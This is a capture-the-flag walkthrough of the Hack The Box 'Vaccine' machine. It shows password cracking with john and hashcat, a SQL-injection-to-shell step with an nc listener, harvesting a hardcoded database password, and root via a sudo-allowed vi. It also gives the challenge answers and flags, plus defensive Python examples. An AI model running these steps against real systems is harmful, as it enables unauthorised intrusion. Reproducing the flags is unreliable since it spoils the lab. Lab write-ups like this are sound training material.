HTB – Hack the Box – Tier 2 – 3rd Challenge – Vaccine

Deep Dive: Solving HTB Tier 2 – Challenge 3 ‘Vaccine’

Join us in this technical exploration of the ‘Vaccine’ challenge, part of the “HTB – Hack the Box Series”. This tutorial is one of many in our series designed to advance your cybersecurity skills. Explore more challenges at: HTB – Hack the Box Series.

System Update and VPN Connectivity

Ensure your Kali Linux is updated for the latest functionalities and security patches:

$ sudo apt update
$ sudo apt full-upgrade -y

Establish a secure VPN connection to access the HTB environment:

$ sudo openvpn Downloads/starting_point_UserName.ovpn

Initial Reconnaissance with Nmap

Use Nmap to perform a comprehensive scan on the target system, identifying open ports and running services:

nmap -sC -sV -p-
└─$ nmap -sC -sV
Starting Nmap 7.93 ( ) at 2022-11-09 11:18 EST
Nmap scan report for
Host is up (0.044s latency).
Not shown: 997 closed tcp ports (conn-refused)
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0ee58077534b00b9165b259569527a4 (RSA)
|   256 ac6e81188922d7a7417d814f1bb8b251 (ECDSA)
|_  256 425bc321dfefa20bc95e03421d69d028 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|_      httponly flag not set
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 9.26 seconds
  • Besides SSH and HTTP, what other service is hosted on this box? – ftp
  • This service can be configured to allow login with any password for specific username. What is that username? – Anonymous
  • What is the name of the file downloaded over this service? –
  • Add the domain name to the local hosts file
└─$ sudo nano /etc/hosts
[sudo] password for toor: 
└─$ cat /etc/hosts             localhost       kali

# HTB unika.htb vaccine.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
  • FTP to the domain name, authenticate as Anonymous with any password, and get the file
└─$  ftp vaccine.htb
Connected to vaccine.htb.
220 (vsFTPd 3.0.3)
Name (vaccine.htb:toor): Anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>  get
local: remote:
229 Entering Extended Passive Mode (|||10886|)
150 Opening BINARY mode data connection for (2533 bytes).
100% |*********************************************************************************************************************************|  2533      774.21 KiB/s    00:00 ETA
226 Transfer complete.
2533 bytes received in 00:00 (60.43 KiB/s)
ftp> quit
221 Goodbye.


  • What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts? – zip2john
└─$ locate zip2john               
└─$ zip2john > hash
ver 2.0 efh 5455 efh 7875 PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
└─$ cat hash
$pkzip$2*1*1*0*8*24*5722*543fb39ed1a919ce7b58641a238e00f4cb3a826cfb1b8f4b225aa15c4ffda8fe72f60a82*2*0*3da*cca*1b1ccd6a*504*43*8*3da*989a*…*$/pkzip$,
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (     
1g 0:00:00:00 DONE (2022-11-09 12:27) 50.00g/s 614400p/s 614400c/s 614400C/s 123456..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
└─$ unzip                                     
[] index.php password: 
  inflating: index.php               
  inflating: style.css               
└─$ cat index.php   
<!DOCTYPE html>
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");


└─$ hashcat -m 0 2cb42f8734ea607eefed3b70af13bbd3 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
* Device #1: pthread-AMD Ryzen 5 5600H with Radeon Graphics, 2921/5906 MB (1024 MB allocatable), 6MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 2cb42f8734ea607eefed3b70af13bbd3
Time.Started.....: Thu Nov 10 13:16:13 2022 (0 secs)
Time.Estimated...: Thu Nov 10 13:16:13 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1598.9 kH/s (0.11ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 101376/14344385 (0.71%)
Rejected.........: 0/101376 (0.00%)
Restore.Point....: 98304/14344385 (0.69%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Dominic1 -> ilovehim123
Hardware.Mon.#1..: Util: 14%

Started: Thu Nov 10 13:15:49 2022
Stopped: Thu Nov 10 13:16:14 2022
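
The index.php excerpt above compares a single unsalted MD5 of the submitted password to a constant in the source, which is why the hashcat run recovers it almost immediately. The following Python is an added example, not code from the challenge or the original post: it mirrors that check beside a salted scrypt verifier. The function names and the scrypt cost parameters are assumptions.

```python
import hashlib
import hmac
import os

# Hash copied from the index.php excerpt on this page.
PAGE_MD5 = "2cb42f8734ea607eefed3b70af13bbd3"

# scrypt cost parameters: assumed values for this example, tune per host.
SCRYPT = dict(n=2**14, r=8, p=1, dklen=32)


def legacy_check(password):
    """Mirror of the PHP test: one unsalted MD5 compared to a source constant.

    The same password always yields the same digest, so a leaked hash can be
    tested against a wordlist at one cheap hash per guess.
    """
    return hashlib.md5(password.encode()).hexdigest() == PAGE_MD5


def enroll(password):
    """Return (salt, key): a fresh random salt and the scrypt-derived key.

    Store both in the database, never in the application source.
    """
    salt = os.urandom(16)
    return salt, hashlib.scrypt(password.encode(), salt=salt, **SCRYPT)


def verify(password, salt, key):
    """Re-derive with the stored salt and compare in constant time."""
    candidate = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT)
    return hmac.compare_digest(candidate, key)


if __name__ == "__main__":
    salt_a, key_a = enroll("qwerty789")
    salt_b, key_b = enroll("qwerty789")
    print("legacy check accepts password:", legacy_check("qwerty789"))
    print("two enrollments share a key:  ", key_a == key_b)
    print("scrypt verify, right password:", verify("qwerty789", salt_a, key_a))
    print("scrypt verify, wrong password:", verify("qwerty788", salt_a, key_a))
```

In PHP itself the equivalent of enroll and verify is the built-in password_hash() and password_verify() pair.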


  • What is the password for the admin user on the website? – qwerty789
  • What option can be passed to sqlmap to try to get command execution via the SQL injection? – --os-shell
  • sqlmap -h
  • nc mkfifo
python3 -c 'import pty;pty.spawn("/bin/bash");'
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 42756
sh: 0: can't access tty; job control turned off
$ whoami
$ find / -perm -4000 -type f 2>/dev/
sh: 2: cannot create /dev/: Is a directory
$ pwd
$ cd /var/www/html
$ ls
$ grep -i -R "pass" *
dashboard.php:    $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
index.php:  if(isset($_POST['username']) && isset($_POST['password'])) {
index.php:    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
index.php:        <label for="login__password"><svg class="icon"><use xmlns:xlink="" xlink:href="#lock"></use></svg><span class="hidden">Password</span></label>
index.php:        <input id="login__password" type="password" name="password" class="form__input" placeholder="Password" required>
style.css:.form input[type='password'],
style.css:.login input[type='password'],
style.css:.login input[type='password'],
style.css:.login input[type='password']:focus,
style.css:.login input[type='password']:hover,
└─$ ssh postgres@vaccine.htb
The authenticity of host 'vaccine.htb (' can't be established.
ED25519 key fingerprint is SHA256:4qLpMBLGtEbuHObR8YU15AGlIlpd0dsdiGh/pkeZYFo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'vaccine.htb' (ED25519) to the list of known hosts.
postgres@vaccine.htb's password: 
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Fri 11 Nov 2022 02:39:29 PM UTC

  System load:  0.15              Processes:             187
  Usage of /:   32.6% of 8.73GB   Users logged in:       0
  Memory usage: 19%               IP address for ens160:
  Swap usage:   0%

0 updates can be installed immediately.
0 of these updates are security updates.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

postgres@vaccine:~$ sudo -l
[sudo] password for postgres: 
Matching Defaults entries for postgres on vaccine:

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
postgres@vaccine:~$ ls
11  user.txt                                                                                               
postgres@vaccine:~$ cat user.txt                                                                           
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf                                       
# whoami                                                                                                   
# cd /root                                                                                                 
# ls                                                                                                       
pg_hba.conf  root.txt  snap                                                                                
# cat root.txt                                                                                             
  • What program can the postgres user run as root using sudo? – vi
  • user flag – ec9b13ca4d6229cd5cc1e09980965bf7
  • root flag – dd6e058e814260bc70e9bbdef2715849
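
The sudo rule above lets postgres run vi as root, and the transcript shows a root prompt right after the editor starts. As an added example (not part of the original walkthrough), this Python audit reads `sudo -l` output and flags rules that grant programs with a built-in command mode, suggesting sudoedit for editor rules. The program list, the function name and the second sample rule are assumptions constructed for the example.

```python
import re

# Programs with a built-in shell escape or command mode (short, non-exhaustive
# list assumed for this example).
ESCAPABLE = {"vi", "vim", "view", "nano", "ed", "emacs", "less", "more", "man"}
EDITORS = {"vi", "vim", "nano", "ed", "emacs"}

# One rule line of `sudo -l` output: "(runas) [TAG: ...] cmd[, cmd ...]"
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

# Constructed sample: the (ALL) rule is the one shown on this page, the
# (root) rule is invented for contrast.
SAMPLE = """\
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
    (root) NOPASSWD: /usr/bin/pg_lsclusters, /usr/bin/less /var/log/syslog
"""


def audit_sudo_l(text):
    """Return one finding per sudo rule that grants an escapable program."""
    findings = []
    for line in text.splitlines():
        match = RULE.match(line)
        if not match:
            continue  # header, Defaults and blank lines
        runas, _tags, cmds = match.groups()
        # sudoers escapes a literal comma inside arguments as "\,".
        for cmd in re.split(r"(?<!\\),\s*", cmds):
            argv = cmd.split()
            if not argv:
                continue
            prog = argv[0].rsplit("/", 1)[-1]
            if prog not in ESCAPABLE:
                continue
            if prog in EDITORS and len(argv) > 1:
                # sudoedit edits a temporary copy as the invoking user.
                fix = "sudoedit " + " ".join(argv[1:])
            else:
                fix = "replace with a non-interactive command"
            findings.append({"runas": runas.strip(), "command": cmd, "fix": fix})
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE):
        print(finding)
```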

Ethical Hacking Reminder

This guide provides a technical walkthrough for solving the ‘Vaccine’ challenge on HTB. We promote ethical hacking practices and encourage using these skills for enhancing cybersecurity knowledge and defense capabilities.

